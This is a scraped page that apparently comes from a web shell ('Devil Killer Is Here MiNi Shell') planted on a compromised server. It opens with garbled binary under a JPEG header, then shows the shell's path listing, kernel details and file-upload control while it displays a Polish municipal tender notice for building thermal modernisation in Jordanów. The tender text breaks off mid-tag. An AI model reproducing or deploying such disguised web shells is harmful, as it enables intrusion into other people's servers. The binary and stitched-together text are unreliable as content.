JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220627/0022489201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja budynków użyteczności publicznej na terenie Miasta Jordanowa Realizowana w formule „zaprojektuj i wybuduj” w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Jordanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491893227</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jordanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">182691700</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">miasto@jordanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.jordanow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja budynków użyteczności publicznej na terenie Miasta Jordanowa Realizowana w formule „zaprojektuj i wybuduj” w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b017c7e-f5ef-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00224892</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00018170/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Termomodernizacja budynków użyteczności publicznej na terenie miasta Jordanowa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.www.malopolska.pl/umjordanow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/,https://epuap.gov.pl,https://www.bip.malopolska.pl/umjordanow,<br/>https://jordanow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.<br/>1) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>2) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.<br/>3) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>4) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>5) Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępny jest na Liście wszystkich postępowań na miniPortalu oraz stanowi załącznik nr 11 do niniejszej SWZ.<br/>2. Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z Rozporządzeniem Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. <br/>3. Zalecenia: <br/>1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf <br/>2) w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: − .zip − .7Z <br/>3) wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. <br/>4) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB, <br/>5) ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES, <br/>6) pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. <br/>Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym, <br/>7) Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i <br/>kwalifikowanym może doprowadzić do problemów w weryfikacji plików, <br/>8) Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty, <br/>9) jeśli Wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. <br/>4. Za datę przekazania oferty oraz wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Miasto Jordanów reprezentowane przez Burmistrza Miasta Jordanowa z siedzibą przy ul. Rynek 1, 34-240 Jordanów. Z administratorem – można skontaktować się poprzez adres email miasto@jordanow.pl lub pisemnie na adres siedziby administratora. <br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem e-mail: inspektor@cbi24.pl<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. <br/>4. Dane osobowe będą przetwarzane zgodnie z art. 78 ust. 1 i 4 ustawy z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019), zwanej dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami PZP.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 4 PZP.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z PZP. <br/>8. Osoba, której dane dotyczą ma prawo do:<br/>1) dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania, <br/>2) w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/>9. Osobie, której dane dotyczą nie przysługuje:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>3) na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych. <br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z Pzp, jak również nie może naruszać integralności protokołu oraz jego załączników.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.<br/>(więcej Rozdział II. OCHRONA DANYCH OSOBOWYCH SWZ)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z Pzp, jak również nie może naruszać integralności protokołu oraz jego załączników.<br/>2. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IRG.271.1.11.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest termomodernizacja obiektów użyteczności publicznej na terenie Miasta Jordanowa realizowana w formule „zaprojektuj i wybuduj” w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych, obejmująca 4 części <br/><br/>Część 1 : <br/>- Budynek Urzędu Miasta Jordanowa, ul. Rynek 1, 34-240 Jordanów;<br/>- Budynek mienia komunalnego – Biblioteka Miejska, ul. Piłsudskiego 25, 34-240 Jordanów;<br/>- Budynek NZOZ „Przychodnia w Jordanowie”, ul. 3 Maja 2A, 34-240 Jordanów;<br/>- Budynek Stacji Uzdatniania i Ujęcia Wody, ul. Nad Skawą 6, 34-240 Jordanów.<br/>Główny kod CPV: 45215000-7 -Roboty budowlane w zakresie budowy obiektów budowlanych opieki <br/>zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności <br/>publicznej<br/>Projektowanie – kod CPV: 71320000-7;<br/>Roboty budowlane – kod CPV: 45111000-8, 45111100-9, 45321000-3, 45430000-0, 45111300-1, <br/>45111200-0, 45453100-8, 45320000-6, 45111240-2, 45321000-4, <br/>45262100-2, 45432000-4, 45421100-5, 45261000-4, 45262522-6;<br/>Roboty sanitarne – kod CPV: 45331000-6; <br/>Roboty elektryczne – kod CPV: 31520000-7, 09331200-0;<br/>a) Projektowanie (usługi architektoniczne, budowlane, inżynieryjne i kontrolne) <br/>b) Roboty budowlane, w tym: <br/>Roboty rozbiórkowe <br/>Roboty rozbiórkowe poddasza <br/>Roboty ziemne <br/>Roboty przygotowawcze <br/>Izolacja fundamentów i ścian piwnic <br/>Drenaż <br/>Termomodernizacja ścian <br/>Termomodernizacja ścian i stropu nad nieużytkową piwnicą <br/>Rusztowania <br/>Izolacja termiczna poddasza <br/>Remont ścian, dostosowanie do założeń termomodernizacji<br/>Stolarka <br/>Podokienniki <br/>Dach pokrycie <br/>Przemurowanie kominów<br/>c) nstalacje sanitarne, w tym:<br/>Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych <br/>d) Instalacje elektryczne, w tym:<br/>Oprawy oświetleniowe sufitowe <br/>Słoneczne moduły fotoelektryczne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">471 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy ocenie ofert w każdej z części zamówienia oddzielnie Zamawiający będzie kierował się kryteriami przedstawionymi poniżej:<br/>2. Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>1) dla części I-III <br/>a. Cena - 60 %,<br/>b. Długość okresu gwarancji jakości na przedmiot zamówienia – 40 %,<br/><br/>3. Punkty przyznawane za podane w pkt 2 kryteria będą liczone według następujących wzorów:<br/>3.1. dla części I-III:<br/>1) Kryterium cena:<br/><br/>C = (Cmin/Cr )* 100 pkt * 60 % <br/>C - liczba punktów przyznanych badanej ofercie w ramach kryterium cena <br/>C min – cena ofert najtańszej <br/>Cr – cena oferty rozpatrywanej<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium ceny.<br/>Maksymalna liczba punktów – 60 pkt.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określonego kryterium, otrzyma maksymalną ilość punktów.<br/>Pozostałym Wykonawcom, spełniającym wymagania przypisana zostanie odpowiednio mniejsza liczba punktów.<br/>2) Długość okresu gwarancji jakości na przedmiot zamówienia-40%<br/>Wykonawca zadeklaruje okres gwarancji w formularzu oferty.<br/>Oferta może otrzymać maksymalnie 40 pkt (1%=1pkt) w zakresie kryterium okres gwarancji na wykonany przedmiot umowy, przy czym:<br/>a) Oferta z 60 miesięcznym okresem gwarancji otrzyma 0 pkt<br/>b) Oferta z 72 miesięcznym okresem gwarancji otrzyma 20 pkt<br/>c) Oferta z 120 miesięcznym okresem gwarancji otrzyma 40 pkt<br/>Minimalny okres gwarancji na wykonany przedmiot umowy wymagany przez Zamawiającego nie może być krótszy niż 60 miesięcy licząc od dnia podpisania protokołu odbioru końcowego.<br/>Maksymalny okres gwarancji na wykonany przedmiot umowy nie może być dłuższy niż 120 miesięcy licząc od dnia podpisania protokołu odbioru końcowego<br/>Zaoferowanie dłuższego okresu gwarancji na wykonany przedmiot umowy niż 120 miesięcy liczone będzie, jak dla 120 miesięcy.<br/>W przypadku gdy Wykonawca nie wskaże w formularzu ofertowym okresu gwarancji, nie otrzyma punktów w nn. kryterium, a Zamawiający przyjmie, że zaoferowany okres jest okresem minimalnym i wynosi 60 miesięcy.<br/>W przypadku, kiedy Wykonawca w formularzu ofertowym wskaże okres gwarancji na wykonany przedmiot umowy krótszy niż 60 miesięcy wówczas Zamawiający odrzuci ofertę Wykonawcy jako niezgodną z treścią SWZ.<br/>4. Oferta, która otrzyma największą, łączną liczbę punktów uznana zostanie za najkorzystniejszą( w każdej z części zamówienia oddzielnie). Ocena ogólna poszczególnych ofert dokonywana będzie w oparciu o poniższą formułę:<br/>P = C + G<br/>P – oznacza łączną oceną jako sumę punktów w poszczególnych kryteriach<br/>C – liczba punktów uzyskanych w kryterium cena<br/>G - liczba punktów uzyskanych w kryterium długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest termomodernizacja obiektów użyteczności publicznej na terenie Miasta Jordanowa realizowana w formule „zaprojektuj i wybuduj” w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych, obejmująca 4 części <br/><br/>Część 2 – Budynek Szkoły Podstawowej im. Bohaterów Września 1393, ul. Kolejowa 7, 34-240 Jordanów;<br/>Główny kod CPV: 45215000-7 -Roboty budowlane w zakresie budowy obiektów budowlanych opieki <br/>zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności <br/>publicznej<br/>Projektowanie – kod CPV: 71320000-7;<br/>Roboty budowlane – kod CPV: 45111100-9, 45111300-1, 45111200-0, 45453100-8, 45320000-6, <br/>45111240-2, 45321000-3, 45262100-2, 45421000-4, 45421100-5, <br/>Roboty sanitarne – kod CPV: 45331000-6; <br/>Roboty elektryczne – kod CPV: 31520000-7, 09331200-0;<br/><br/>a) Projektowanie (usługi architektoniczne, budowlane, inżynieryjne i kontrolne) <br/>b) Roboty budowlane, w tym: <br/>Roboty rozbiórkowe <br/>Roboty ziemne <br/>Roboty przygotowawcze <br/>Izolacja fundamentów i ścian piwnic <br/>Drenaż <br/>Rusztowania <br/>Izolacja termiczna poddasza <br/>Stolarka <br/>Podokienniki <br/>c) Instalacje sanitarne, w tym:<br/>Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych <br/>d) Instalacje elektryczne, w tym:<br/>Oprawy oświetleniowe sufitowe <br/>Słoneczne moduły fotoelektryczne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">471 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span 